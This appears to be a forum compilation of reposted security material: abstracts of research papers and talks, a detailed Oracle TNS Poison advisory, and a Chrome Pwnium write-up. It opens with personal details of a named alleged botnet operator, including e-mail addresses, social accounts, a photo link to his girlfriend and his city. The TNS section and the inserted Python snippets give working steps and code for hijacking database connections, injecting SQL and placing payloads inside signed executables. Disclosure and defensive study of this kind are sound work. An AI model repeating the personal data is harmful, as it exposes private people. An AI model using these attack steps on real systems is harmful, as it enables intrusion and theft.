We identified several e-mail addresses: frk7@live.it frk7@live.com francesco.pompo@gmail.com siliceous@live.com
Skype account: nobbosterminator
Facebook page: http://www.facebook.com/Frk7.face
Picasa page: https://picasaweb.google.com/101402927290625732642/ProfilePhotos
His girlfriend: https://picasaweb.google.com/101402927290625732642/ProfilePhotos#5654185571837906082
Twitter account: https://twitter.com/#!/frk7tweet
Another repository: http://frk7.altervista.org/
And finally, he lives in Trapani (Italy). It is amazing that a botnet manager publishes so much information about his private life!! It's so crazy that we wonder whether this botnet is not a honeypot of the Italian police!!

Sursa: en_analyse_herpnet - malware-lu - Malware.lu technical analysis - Google Project Hosting
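A side note on the string obfuscation shown at the top of this analysis: the "encryption" is plain ROT13 (uggc decodes to http, sgc to ftp), so every configuration string can be recovered in a couple of lines. A hypothetical re-implementation of the decode helper, using only the Python standard library:

```python
import codecs

def decode(s: str) -> str:
    """ROT13 is its own inverse, so the same call obfuscates and deobfuscates."""
    return codecs.decode(s, "rot_13")

# Recover one of the C&C URLs from the table above.
print(decode("uggc://jjj.mrebkpbqr.arg/urecarg/"))  # http://www.zeroxcode.net/herpnet/
```

Note that digits, dots and slashes are untouched by ROT13, which is why the URLs in the decode table above are still recognizable in their obfuscated form.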
-
Comprehensive Experimental Analyses of Automotive Attack Surfaces

Stephen Checkoway, Damon McCoy, Brian Kantor, Danny Anderson, Hovav Shacham, and Stefan Savage
University of California, San Diego

Karl Koscher, Alexei Czeskis, Franziska Roesner, and Tadayoshi Kohno
University of Washington

Abstract
Modern automobiles are pervasively computerized, and hence potentially vulnerable to attack. However, while previous research has shown that the internal networks within some modern cars are insecure, the associated threat model—requiring prior physical access—has justifiably been viewed as unrealistic. Thus, it remains an open question if automobiles can also be susceptible to remote compromise. Our work seeks to put this question to rest by systematically analyzing the external attack surface of a modern automobile. We discover that remote exploitation is feasible via a broad range of attack vectors (including mechanics tools, CD players, Bluetooth and cellular radio), and further, that wireless communications channels allow long distance vehicle control, location tracking, in-cabin audio exfiltration and theft. Finally, we discuss the structural characteristics of the automotive ecosystem that give rise to such problems and highlight the practical challenges in mitigating them.

Download: http://www.autosec.org/pubs/cars-usenixsec2011.pdf
-
[h=1]Injecting custom payload into signed Windows executables[/h] Analysis of the CVE-2012-0151 vulnerability A valid signature of a PE executable file doesn't always guarantee that the file hasn't been tampered with. The talk will explain the problem, show the vulnerable targets as well as their possible modifications, and discuss available fixes. Digital signing of executable modules has become a de facto standard in mainstream software products on Microsoft Windows. A file's digital signature confirms that the file has really been created by the signer and its content has not been tampered with by any third party. The signature implies a certain level of trust - if you trust the company that created the file, you trust the file itself. However, we discovered a way to modify certain classes of signed executables while keeping their digital signatures valid. It means that we can take a trusted signed application and inject our own payload that gets executed or installed when this application is run; this modified executable is still correctly signed by the original signer. We have reported this vulnerability to Microsoft (CVE-2012-0151) and they have released a fix in April 2012. However, since the issue is not just a bug in Windows code, but also a design feature combined with bugs in third-party applications, the fix does not cover 100% of possible cases. In my talk, I would like to present the technical aspects of the problem. I will describe how a signed executable can be modified, what the suitable/vulnerable candidates are, and what the released hotfix actually does. I will offer some advice for software developers on how to avoid creating applications which are vulnerable to this type of attack. [h=2]Attached files[/h] Slides (application/octet-stream - 3.7 MB) [h=2]Links[/h] http://blog.avast.com/2012/04/12/beware-of-a-new-windows-security-vulnerability-ms12-024/ Sursa: Recon2012: Injecting custom payload into signed Windows executables
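Background for the attack surface this talk covers: the Authenticode digest of a PE file deliberately skips the checksum field, the security data-directory entry, and the attribute certificate table itself, so bytes placed inside the certificate table do not alter the signed hash. A minimal sketch (hypothetical helper name; PE layout per the PE/COFF specification) that locates that unauthenticated region:

```python
import struct

def security_directory(pe: bytes):
    """Return (file_offset, size) of the attribute certificate table of a PE file.

    Note: unlike the other data directories, IMAGE_DIRECTORY_ENTRY_SECURITY (index 4)
    stores a raw file offset, not an RVA.
    """
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 24                          # 4-byte signature + 20-byte COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    dd = opt + (96 if magic == 0x10B else 112)   # data directories: PE32 vs PE32+
    return struct.unpack_from("<II", pe, dd + 4 * 8)
```

Bytes appended within this region (with the WIN_CERTIFICATE dwLength and the directory size bumped accordingly) leave the Authenticode digest intact, which is the primitive the talk builds on; the MS12-024 fix tightens which of those extra bytes verification will tolerate.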
-
The Case for Semantics-Based Methods in Reverse Engineering
© Rolf Rolles, Funemployed
RECON 2012 Keynote

The Point of This Keynote
- Demonstrate the utility of academic program analysis towards solving real-world reverse engineering problems

Definitions
- Syntactic methods consider only the encoding rather than the meaning of a given object, e.g., sequences of machine-code bytes or assembly language instructions, perhaps with wildcards
- Semantic methods consider the meaning of the object, e.g., the effects of one or more instructions

Download: http://recon.cx/2012/schedule/attachments/52_semantics-based-methods.pdf
-
Smashing the Atom

About Me
- Security Researcher at Azimuth Security
- Past presentations: Heaps of Doom (w/ Chris Valasek), Kernel Attacks Through User-Mode Callbacks, Kernel Pool Exploitation on Windows 7
- Generally interested in operating system internals and bug finding
- Recent focus on embedded platforms

This Talk
- A rather unusual Windows bug class
- Affects Windows atoms
- 3 vulnerabilities patched 2 days ago in MS12-041
- Allows a non-privileged user to run code in the context of a privileged process, e.g. the Windows login manager (winlogon)
- No need to run arbitrary code in Ring 0
- DEP/ASLR? SMEP? No problem!

Download: http://mista.nu/research/smashing_the_atom.pdf
-
The history of a -probably- 13 years old Oracle bug: TNS Poison
From: Joxean Koret <joxeankoret () yahoo es>
Date: Wed, 18 Apr 2012 23:03:00 +0200

tl;dr -> Patch your database ASAP with Oracle Critical Patch Update April 2012.

Introduction
------------
The following advisory explains a vulnerability I found in 2008 in all versions of Oracle Database server until very recently. The bug is probably present in any Oracle Database version from 1999 (Oracle 8i) to the latest one (Oracle 11g) without CPU-APR-2012. The bug was reported to Oracle in 2008, so it "only" took them 4 years to fix it after it was reported. The vulnerability, which I called TNS Poison, affects the component called the TNS Listener, which is responsible for connection establishment. To exploit the vulnerability no privilege is needed, just network access to the TNS Listener. The "feature" exploited is enabled by default in all Oracle versions starting with Oracle 8i and ending with Oracle 11g (without CPU-APR-2012).

Vulnerability details
---------------------
The Oracle TNS Listener component routes connections from the client to the database server depending on the database instance name the client wants to connect to. These instances are registered at the TNS Listener using any of the following methods:

1. Local registration. The database's internal process PMON connects via IPC to the TNS Listener and registers the database's instance name in the local listener. This can be changed by altering the system parameter LOCAL_LISTENER (ALTER SYSTEM SET LOCAL_LISTENER='LISTENER_NAME').

2. Remote registration. The database's internal process PMON connects via TCP (or any other supported network protocol) to the remote TNS Listener and registers the database's instance name in the remote listener. This behavior can be specified by setting the system parameter REMOTE_LISTENER (ALTER SYSTEM SET REMOTE_LISTENER='REMOTE_LISTENER_NAME').
This feature (remote registration) first appeared in Oracle 8i (1999) - this is the reason why I say it's probably vulnerable since that version; however, I didn't test such old database servers - and is currently used in Oracle 11g as well as in Oracle 9i and 10g.

The process of registering an instance is as follows:

1. The client sends a TNS packet of type CONNECT (TNS_TYPE_CONNECT = 1) to the TNS Listener with the following NV string:
   - Oracle 9i to 11g: (CONNECT_DATA=(COMMAND=SERVICE_REGISTER_NSGR))
   - Oracle 8i: (CONNECT_DATA=(COMMAND=SERVICE_REGISTER))
2. The server answers with a TNS packet of type ACCEPT (TNS_TYPE_ACCEPT = 2). After this, the protocol communication changes a bit (all data will be binary).
3. The client sends a "data packet" (TNS_TYPE_DATA = 6) to the TNS listener which contains the following data:
   1. Service name to register.
   2. Instances to register under the specified service name.
   3. Maximum number of client connections allowed.
   4. Current number of client connections established.
   5. Handler's name.
   6. IP address and port to connect to the database.
   7. ...
4. If the packet is well formed, the server will answer with another TNS "data packet" with the registered instances.

After this step, the instances and service names are registered in the remote TNS Listener, and any connection attempt to the TNS listener using the specified SERVICE_NAME or SID (database instance) will be routed to the remote database server. The connection established to register the remote database must stay open; otherwise, the remote TNS listener will consider that the database has crashed and will deregister the Oracle database instance. According to the Oracle documentation, the "PMON" process will afterwards communicate with the TNS Listener, sending update packets (TNS_TYPE_DATA packets) to specify the load of the database, the number of currently connected users, etc...
Every minute or, at most, every 10 minutes (the higher the database load, the lower the update period).

This way, an attacker is able to register any instance in the remote TNS listener, and connections to the registered instance will be routed to the attacker's machine. But is this interesting? Well, not very "exciting". But what happens if an attacker tries to register an already registered instance name or service name? The TNS listener will consider this newly registered instance name a cluster instance (Oracle RAC, Real Application Clusters) or a failover instance (Oracle Failover). When 2 or more database instances are registered with the same name, the TNS listener will load-balance between all the registered remote database servers. The most recently registered remote database server will receive the first client connection, and the second will be routed to the previously registered remote database server.

Routing client connections
--------------------------
The attack explained in this document can be used to, for example, route legitimate client connections to an attacker-controlled machine and forward them to the legitimate database server instance, as shown below:

------------------------------------------------------------------------
[Legit. Client 1]----------------------------
                                             \
                                              \
                                               V
[Legit. Client 2]---------------+        [Database Server]
                                |               A
[Legit. Client 3]---------------+               |
                                |               |
                                V               |
                           [ Attacker ]---------+

[Note: Between 50/75% of the connections gets routed through the
attacker controlled box]
------------------------------------------------------------------------

The clients connect to the attacker's controlled box, which acts as a TNS proxy and forwards all connections to the legitimate database server, as shown in the picture.
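Step 1 of the registration handshake described earlier - the CONNECT packet carrying the SERVICE_REGISTER_NSGR NV string - can be sketched as below. The field layout follows publicly documented TNS dissections; the exact constants used here are illustrative assumptions, not values taken from the advisory or its POC:

```python
import struct

SERVICE_REGISTER = b"(CONNECT_DATA=(COMMAND=SERVICE_REGISTER_NSGR))"

def tns_connect(nv: bytes, version: int = 310) -> bytes:
    """Build a TNS CONNECT (packet type 1) carrying an NV connect string."""
    body = struct.pack(
        ">HHHHHHHHHHIH",
        version,   # protocol version
        300,       # lowest compatible version
        0,         # service options
        2048,      # SDU size
        32767,     # TDU size
        0x4F98,    # NT protocol characteristics (assumed value)
        0,         # line turnaround
        1,         # "value of one" byte-order probe
        len(nv),   # length of connect data
        34,        # offset of connect data from packet start (8 + 26)
        0,         # maximum receivable data
        0,         # flags
    )
    # 8-byte TNS header: length, packet checksum, type (1 = CONNECT), flags, header checksum
    header = struct.pack(">HHBBH", 8 + len(body) + len(nv), 0, 1, 0, 0)
    return header + body + nv
```

As the advisory stresses, no authentication is involved at any point: anything that can reach port 1521 can send this packet.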
Not all the connections will be routed through the attacker's box, as the TNS Listener will load-balance between all the registered instances, but continuously re-registering the same instance will assure that at least 50% of the connections are routed through our controlled box.

Sniffing connections
--------------------
The very first use of the attack explained in this document is obvious: the attacker owns the data, as almost all the connections go through the attacker's box. The attacker can record all the data exchanged between the database server and the client machines, and both client and server will be oblivious to the attack. If the attacker just wants to own the target's data, (s)he is done. Game over.

Injecting arbitrary commands (Session hijack)
---------------------------------------------
As many of the client connections reach the legitimate database through our proxy, we are also able to inject commands and/or hijack connections. To inject commands, simply wait for the client to send an SQL query/statement, replace the contents of the statement with our desired command, and that's all. To hijack a session, simply close the socket opened between the client and our box and use the connection channel already established between the real database server and our machine. You may start sending SQL statements right away.

Exploiting the vulnerability
----------------------------
The following sections show how a successful attack can be launched against an Oracle database. The developed POC registers the service name ORCL11 in the TNS Listener and forwards all the connections from the attacker's controlled machine to the legitimate server.

Sniffing connections and forwarding client requests
---------------------------------------------------
Imagine the following exploit scenario:

1. The database server's IP address is 192.168.1.11 and it has registered the instance ORCL11.
2. The legitimate client's address is 192.168.1.12.
3.
The attacker's machine's address is 192.168.1.25.

An attacker will follow these steps:

1. The attacker runs a TCP proxy which forwards all connections from his/her local port 1521 to the real database server's port 1521.
2. The attacker now connects to the TNS Listener via TCP/IP and sends the following connect packet: (COMMAND=SERVICE_REGISTER_NSGR).
   1. Note that no authentication is required.
3. After receiving the server's answer, the attacker sends a packet with the following data:
   1. Service to register: ORCL11.
   2. Address of the fake database: 192.168.1.25.
   3. Load of the database server: 0.
      1. Remember: the lower the load, the higher the chance of receiving client connections.
4. The attacker's exploit enters a loop and re-registers the instance every minute, closing the previously opened socket.
   1. The last registered database address is the favorite for routing client connections, and the attacker wants to receive them all.

Proof of concept notes
----------------------
The developed P.O.C. is valid only for service names 6 characters long. However, there is one easy way to adapt the exploit to work against any instance name that isn't 6 characters long:

1. Create a database instance with the same name on a machine under your control.
2. Add an entry like the following to your tnsnames.ora file: listener_name = (DESCRIPTION= (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.11)(PORT=1521)))
3. Change the address and port to those of the target.
4. Put a sniffer on your machine listening for any connection on port 1521 (filter: port 1521).
5. Connect with SQL*Plus to your locally created database as SYSDBA and execute the following commands:
   1. $ sqlplus / as sysdba
   2. SQL> ALTER SYSTEM SET REMOTE_LISTENER='LISTENER_NAME';
   3. SQL> ALTER SYSTEM REGISTER;
6. You will see 6 packets in Wireshark (or the sniffer you decided to use). Ignore the first 2 packets.
The 3rd packet (TNS_TYPE_DATA) that your configured database sends from your box to the target is the one you are interested in. You may safely ignore all the other packets. 7. Change the contents of the “buf” variable in the supplied exploit with the contents of this packet. 8. Rerun the exploit against the target. NOTE: You may use this as another attack vector. As your database (which has the same name as the target) is registered in the remote TNS Listener, new connections that goes through the TNS listener you poisoned will be routed to your new database. Funny. TNS Poison POC: Step by step guide ---------------------------------- This is the step by step guide to proof the vulnerability explained in this document by using the supplied POC and the aux module: 1. Open a terminal and run the supplied proxy.py script as shown bellow: $ ./proxy.py –localip 192.168.1.25 localport 1521 –remoteip 192.168.1.11 remoteport 1521 2. Open another terminal and run the supplied script tnspoison.py against the target as in the example shown bellow: $ ./tnspoisonv1.py 192.168.1.25 1521 ORCL11 192.168.1.11 1521 Sending initial buffer ... Answer: Accept(2) Sending registration ... '\x04N\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x04D \x08\xff\x03\x01\x00\x124444...' Answer: Data(6) '\x01J\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x01@ \x08\xff\x03\x01\x00\x1244444...' Sleeping for 10 seconds... (Ctrl+C to stop)... Now, wait for the new connections to arrive. If you checks the listener using the LSNRCTL tool you will something like the following: $ lsnrctl status LSNRCTL for Linux: Version 11.1.0.6.0 Production Connecting to (ADDRESS=(PROTOCOL=tcp)(HOST=)(PORT=1521)) STATUS of the LISTENER ---------------------- Alias LISTENER Version TNSLSNR for Linux: Version 11.1.0.6.0 Production Start Date 08AUG2008 18:38:08 Uptime 0 days 0 hr. 15 min. 
46 sec Trace Level off Security ON: Local OS Authentication SNMP OFF Listener Parameter File /home/joxean/oracle11g/product/11.1.0/db_2/network/admin/listener.ora Listener Log File /home/joxean/oracle11g/diag/tnslsnr/joxeandesktop/ listener/alert/log.xml Listening Endpoints Summary... (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=localhost)(PORT=1521))) Services Summary... Service "ORCL11" has 2 instance(s). Instance "ORCL11", status READY, has 1 handler(s) for this service... Instance "ORCL11", status READY, has 1 handler(s) for this service... Service "ORCL11XDB" has 2 instance(s). Instance "ORCL11", status READY, has 1 handler(s) for this service... Instance "ORCL11", status READY, has 1 handler(s) for this service... Service "ORCL11_XPT" has 2 instance(s). Instance "ORCL11", status READY, has 1 handler(s) for this service... Instance "ORCL11", status READY, has 1 handler(s) for this service... The command completed successfully $ lsnrctl services LSNRCTL for Linux: Version 11.1.0.6.0 Production Connecting to (ADDRESS=(PROTOCOL=tcp)(HOST=)(PORT=1521)) Services Summary... Service "ORCL11" has 2 instance(s). Instance "ORCL11", status READY, has 1 handler(s) for this service... Handler(s): "DEDICATED" established:0 refused:0 state:ready LOCAL SERVER Instance "ORCL11", status READY, has 1 handler(s) for this service... Handler(s): "DEDICATED" established:0 refused:0 state:ready REMOTE SERVER (ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.25)(PORT=1521)) Service "ORCL11XDB" has 2 instance(s). Instance "ORCL11", status READY, has 1 handler(s) for this service... Handler(s): "D000" established:0 refused:0 current:0 max:972 state:ready DISPATCHER <machine: machine, pid: 19194> (ADDRESS=(PROTOCOL=tcp)(HOST=localhost)(PORT=42265)) Instance "ORCL11", status READY, has 1 handler(s) for this service... 
Handler(s): "D000" established:0 refused:0 current:2048 max:1024 state:ready DISPATCHER <machine: 192.168.1.25 , pid: 11447> (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.25)(PORT=57569)) Service "ORCL11_XPT" has 2 instance(s). Instance "ORCL11", status READY, has 1 handler(s) for this service... Handler(s): "DEDICATED" established:0 refused:0 state:ready LOCAL SERVER Instance "ORCL11", status READY, has 1 handler(s) for this service... Handler(s): "DEDICATED" established:0 refused:0 state:ready REMOTE SERVER (ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.25)(PORT=1521)) The command completed successfully Detection --------- The following sections explains how this attack can be somewhat detected at the server side, although no one is perfect (except using OS utilities). Information at the RDBMS Server side ------------------------------------ One may think the following: “Hey! At the server side, the DBA will see that the connections are established from untrusted clients, right?”. Well, yes and no. By using operating system tools, as is pretty obvious, the DBA will see that there are many connections from the same origin host but, by using the V$SESSION dynamic view, that is, the Oracle database's supplied mechanism to see the client connections, the DBA will see that the connections are established from trusted clients. But, they aren't. Why the server thinks client connections are coming from trusted sources? The answer is the following: The server doesn't check if the connections comes from a socket created from the trusted client ip addresses, the RDBMS server just checks the user supplied NV strings in the TNS connect packet. A TNS connect packet (TNS_TYPE_CONNECT = 1) is like the following (stripping all the binary characters, of course): (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=sqlplus) (HOST=joxeandesktop)(USER=joxean))) (ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.11)(PORT=1521))) The highlighted fields are those that are fakeable^Wuser modifiable. 
So, any connection established through our controlled machine will be shown in the RDBMS server as if it were made directly from a trusted client.

TNS Listener's log file
-----------------------
Any attempt to register a new database instance or service will be recorded by the TNS Listener. A line like the following will be shown:

04-AUG-2008 21:26:29 * service_register * DATABASENAME * 0

It isn't sufficient information but, this way, we may detect an attempt to register a new instance. No interesting information (like IP address, client port, etc...) is recorded, so the TNS listener's log file is not very interesting. This applies only to Oracle 8i, 9i and 10g. For Oracle 11g, however, the interesting information will be logged in the alert file (an XML-formatted file). In Oracle 11g any attempt to register a new instance will be logged in the alert file with the following information:

<msg time='2008-08-07T17:30:19.436+02:00' org_id='oracle' comp_id='tnslsnr' type='UNKNOWN' level='16' host_id='joxeandesktop' host_addr='127.0.0.1'> <txt>07-AUG-2008 17:30:19 * service_register * ORCL11 * 0 </txt> </msg>

Unfortunately for us^Wthe attacker, the "host_addr" field holds the information extracted from the socket, not from the NV strings. Oh... This only applies to Oracle 11g with the newest security features enabled, which is, by the way, the default behavior. Anyway, an attack detected at the TNS listener's log level is neither a detected attack at the RDBMS server level nor an attack prevention method.

Workarounds
-----------
Better than using workarounds is to patch the vulnerability. However, in case you're using an outdated version for which no patch is available, or if you can't patch for some reason, the following is a list of possible workarounds.

Possible workarounds
--------------------
There are many possible workarounds. The easiest one is to set the following parameter in the listener.ora configuration file: dynamic_registration = off.
But sometimes you don't want to apply this workaround. For example, if you have an Oracle RAC cluster, all the cluster's instances must be registered in both TNS Listeners, so this workaround is not suitable for Oracle RAC clusters. To apply this workaround in Oracle RAC environments one needs to implement load balancing at the client side, changing every client's tnsnames.ora configuration file to add the complete list of Oracle RAC nodes.

However, there is another possible workaround that is sometimes suitable for Oracle RAC environments. Edit the file protocol.ora or, for older versions, sqlnet.ora, at the server side and add the following directives:

TCP.VALIDNODE_CHECKING = YES
TCP.INVITED_NODE = (Comma,separated,list,of,ALL,valid,clients, ...)

But, anyway, this workaround doesn't prevent valid clients from being used as proxies. Valid clients can still exploit the vulnerability regardless of the VALIDNODE_CHECKING directive, as the client is a valid node.

Then again, there is one more suitable workaround: if the customer has bought (and enabled) the Oracle Advanced Security feature, clients can be configured to use SSL/TLS. Thus, at both the client and server side, the following parameters must be changed in protocol.ora or sqlnet.ora:

Client side: SQLNET.ENCRYPTION_CLIENT=REQUIRED
Server side: SQLNET.ENCRYPTION_SERVER=REQUIRED

The value of these configuration directives must be REQUIRED and not REQUESTED, as is pretty common; otherwise the attacker can reply to the connection attempt claiming that no SSL cipher is supported at the server side (since, to the client, the attacker's controlled box is the trusted database server) and the client will reconnect without using SSL.

Patch information
-----------------
The vulnerability is supposed to be fixed, as reported by Oracle, with Oracle Critical Patch Update April 2012. However, to be honest, I'm very tired of the Oracle world, so I did not test it myself.
I would not be surprised if the patch doesn't correctly/completely fix the vulnerability.

Proof of concept and documentation
----------------------------------
You can download the developed proof of concept and the old documentation - written back in 2008 - from the following links:

Documentation: http://www.joxeankoret.com/download/tnspoison.pdf
Proof of concept: http://www.joxeankoret.com/download/tnspoison.zip

References
----------
Oracle Critical Patch Update Advisory - April 2012: http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
Oracle Advanced Security Manual:
Oracle 11g: http://download.oracle.com/docs/cd/B28359_01/network.111/b28530/asossl.htm
Oracle 10g: http://download.oracle.com/docs/cd/B19306_01/network.102/b14268/toc.htm
Oracle 9i: http://downloadwest.oracle.com/docs/cd/B10500_01/network.920/a96573/toc.htm
Oracle 8i: http://downloaduk.oracle.com/docs/cd/A87860_01/doc/network.817/a85430/toc.htm
Oracle 8.1.6 Registration: http://www.orafaq.com/node/30
Configuring Remote Listener Registration: http://download.oracle.com/docs/cd/B10501_01/network.920/a96580/listener.htm#490372

Notes
-----
Many of the notes, terminal outputs, etc... are taken directly from my original notes from 2008, so some things may be outdated.

Disclaimer
----------
The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

Contact
-------
The vulnerability was found by Joxean Koret in 2008.

All your listeners are belong to us...

Attachment: signature.asc
Description: This is a digitally signed message part

Sursa: Full Disclosure: The history of a -probably- 13 years old Oracle bug: TNS Poison
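The proxy.py used in the step-by-step guide above is not reproduced in the advisory; a minimal stand-in TCP forwarder (my own sketch, not Koret's script) that accepts clients on a local port and pipes both directions to the real listener looks like this:

```python
import socket
import threading

def pipe(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes one way until either side closes; a sniffer/injector would hook here."""
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    finally:
        src.close()
        dst.close()

def tcp_proxy(local, remote) -> None:
    """Listen on `local` (host, port) and forward each connection to `remote`."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(local)
    srv.listen(5)
    while True:
        client, _ = srv.accept()
        upstream = socket.create_connection(remote)
        threading.Thread(target=pipe, args=(client, upstream), daemon=True).start()
        threading.Thread(target=pipe, args=(upstream, client), daemon=True).start()
```

The sniffing and command-injection attacks described in the advisory amount to replacing the pass-through `dst.sendall(data)` with code that logs or rewrites the TNS data packets in flight.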
-
Packets in Packets: Orson Welles' In-Band Signaling Attacks for Modern Radios

Travis Goodspeed, University of Pennsylvania
Sergey Bratus, Dartmouth College
Ricky Melgares, Dartmouth College
Rebecca Shapiro, Dartmouth College
Ryan Speers, Dartmouth College

Abstract
Here we present methods for injecting raw frames at Layer 1 from within upper-layer protocols by abuse of in-band signaling mechanisms common to most digital radio protocols. This packet piggy-backing technique allows attackers to hide malicious packets inside packets that are permitted on the network. When these carefully crafted Packets-in-Packets (PIPs) traverse a wireless network, a bit error in the outer frame will cause the inner frame to be interpreted instead. This allows an attacker to evade firewalls, intrusion detection/prevention systems, user-land networking restrictions, and other such defenses. As packets are constructed using interior fields of higher networking layers, the attacker only needs the authority to send cleartext data over the air, even if it is wrapped within several networking layers. This paper includes tested examples of raw frame injection for IEEE 802.15.4 and 2-FSK radios. Additionally, implementation complications are described for 802.11 and a variety of other modern radios. Finally, we present suggestions for how this technique might be extended from wireless radio protocols to Ethernet and other wired links.

Download: http://static.usenix.org/events/woot11/tech/final_files/Goodspeed.pdf
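The core trick from the abstract can be shown with a toy model: place a complete inner frame (its own preamble, sync word, length and body) inside the payload of an outer frame; if noise corrupts the outer preamble, a receiver scanning for the next sync sequence locks onto the embedded copy and delivers the attacker's inner frame instead. This is a simplified illustration, not a real PHY implementation (only the 802.15.4 preamble/SFD values are taken from the standard):

```python
PREAMBLE = b"\x00\x00\x00\x00"  # IEEE 802.15.4 preamble: four zero bytes
SFD = b"\xa7"                   # IEEE 802.15.4 start-of-frame delimiter

def frame(payload: bytes) -> bytes:
    """Wrap a payload in preamble + SFD + one-byte length, as a simplified PHY frame."""
    return PREAMBLE + SFD + bytes([len(payload)]) + payload

def receive(bits: bytes):
    """Naive receiver: synchronize on the first preamble+SFD it can find."""
    i = bits.find(PREAMBLE + SFD)
    if i < 0:
        return None
    start = i + len(PREAMBLE) + len(SFD)
    length = bits[start]
    return bits[start + 1 : start + 1 + length]

inner = frame(b"EVIL")                    # attacker's frame, carried as ordinary data
outer = frame(b"hello " + inner)          # permitted outer frame
assert receive(outer) == b"hello " + inner  # clean channel: outer frame delivered
corrupted = b"\xff" + outer[1:]             # one bad byte in the outer preamble
assert receive(corrupted) == b"EVIL"        # receiver re-syncs on the inner frame
```

The paper's insight is that the attacker never transmits a raw frame: the inner frame rides along as application data, and the channel's own bit errors do the "injection".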
-
CVE-2012-0769, the case of the perfect info leak

Author: Fermin J. Serna - fjserna gmail.com | fjserna google.com - @fjserna
URL: http://zhodiac.hispahack.com/my-stuff/security/Flash_ASLR_bypass.pdf
Code: http://zhodiac.hispahack.com/my-stuff/security/InfoLeak.as
SWF: http://zhodiac.hispahack.com/my-stuff/security/InfoLeak.swf
Date: 23/Feb/2012

TL;DR: Flash is vulnerable to a reliable info leak that allows ASLR to be bypassed, making exploitation of other vulnerabilities - in browsers, Acrobat Reader, MS Office and any process that can host Flash - trivial, like in the old days when no security mitigations were available. Patch immediately.

1. Introduction

Unless you use wget and vi to download and parse web content, the odds are high that you may be exposed to a vulnerability that renders useless nearly all security mitigations developed in recent years. Nowadays, security relies heavily on exploit mitigation technologies. Over the past years there has been some investment in the development of several mechanisms such as ASLR, DEP/NX, SEHOP, heap metadata obfuscation, etc. The main goal of these is to decrease the exploitability of a vulnerability. The key component of this strategy is ASLR (Address Space Layout Randomization) [1]. Most other mitigation techniques depend on the operation of ASLR. Without it, and based on previous research from the security industry: DEP can be defeated with return-to-libc or ROP gadget chaining, SEHOP can be defeated by constructing a valid chain, ... Put simply, if you defeat ASLR, we are going to party like it's 1999. And this is what happened: a vulnerability was found in Adobe's Flash player (according to Adobe [2] installed on 99% of user computers) that, with some magic explained later, resulted in a multiplatform, highly stable and highly efficient info leak that could be combined with any other vulnerability for trivial exploitation.
This vulnerability, CVE-2012-0769, along with another one that my colleague Tavis Ormandy found, was patched in version 11.1.102.63 [3], released on 05/Mar/2012. According to Adobe, all versions earlier than 11.1.102.63 are impacted by this vulnerability. Flash users can check their current version and the latest available one at Adobe's website [4].
Download: http://zhodiac.hispahack.com/my-stuff/security/Flash_ASLR_bypass.pdf
-
The story of CVE-2011-2018 exploitation
Mateusz "j00ru" Jurczyk
February - April 2012

Abstract: Exploitation of Windows kernel vulnerabilities is recently drawing more and more attention, as observed in both monthly Microsoft advisories and technical talks presented at public security events. One of the most recent security flaws fixed in the Windows kernel was CVE-2011-2018, a vulnerability which could potentially allow a local attacker to execute arbitrary code with system privileges. The problem affected all - and only - 32-bit editions of the Windows NT-family line, up to Windows 8 Developer Preview. In this article, I present how certain novel exploitation techniques can be used on different Windows platforms to reach an elevation of privileges through this specific kernel vulnerability.

Download: j00ru.vexillium.org/blog/20_05_12/cve_2011_2018.pdf
-
[h=3]A Tale Of Two Pwnies (Part 2)[/h]Monday, June 11, 2012 When we wrapped up our recent Pwnium event, we praised the creativity of the submissions and resolved to provide write-ups on how the two exploits worked. We already covered Pinkie Pie’s submission in a recent post, and this post will summarize the other winning Pwnium submission: an amazing multi-step exploit from frequent Chromium Security Reward winner Sergey Glazunov. From the start, one thing that impressed us about this exploit was that it involved no memory corruption at all. It was based on a so-called “Universal Cross-Site Scripting” (or UXSS) bug. The UXSS bug in question (117226) was complicated and actually involved two distinct bugs: a state corruption and an inappropriate firing of events. Individually there was a possible use-after-free condition, but the exploit -- perhaps because of various memory corruption mitigations present in Chromium -- took the route of combining the two bugs to form a “High” severity UXSS bug. However, a Pwnium prize requires demonstrating something “Critical”: a persistent attack against the local user’s account. A UXSS bug alone cannot achieve that. So how was this UXSS bug abused more creatively? To understand Sergey’s exploit, it’s important to know that Chromium implements some of its built-in functions using special HTML pages (called WebUI), hosted at origins such as chrome://about. These pages have access to privileged JavaScript APIs. Of course, a normal web page or web renderer process cannot just iframe or open a chrome:// URL due to strict separation between http:// and chrome:// URLs. However, Sergey discovered that iframing an invalid chrome-extension:// resource would internally host an error page in the chrome://chromewebdata origin (117230). Furthermore, this error page was one of the few internal pages that did not have a Content Security Policy (CSP) applied. A CSP would have blocked the UXSS bug in this context. 
At this point, multiple distinct issues had been abused to gain JavaScript execution in the chrome://chromewebdata origin. The exploit still had a long way to go, though, as there are plenty of additional barriers:
- chrome://chromewebdata does not have any sensitive APIs associated with it.
- chrome://a is not same-origin with chrome://b.
- chrome://* origins only have privileges when the backing process is tagged as privileged by the browser process, and this tagging only happens as a result of a top-level navigation to a chrome:// URL.
- The sensitive chrome://* pages generally have CSPs applied that prevent the UXSS bug in question.
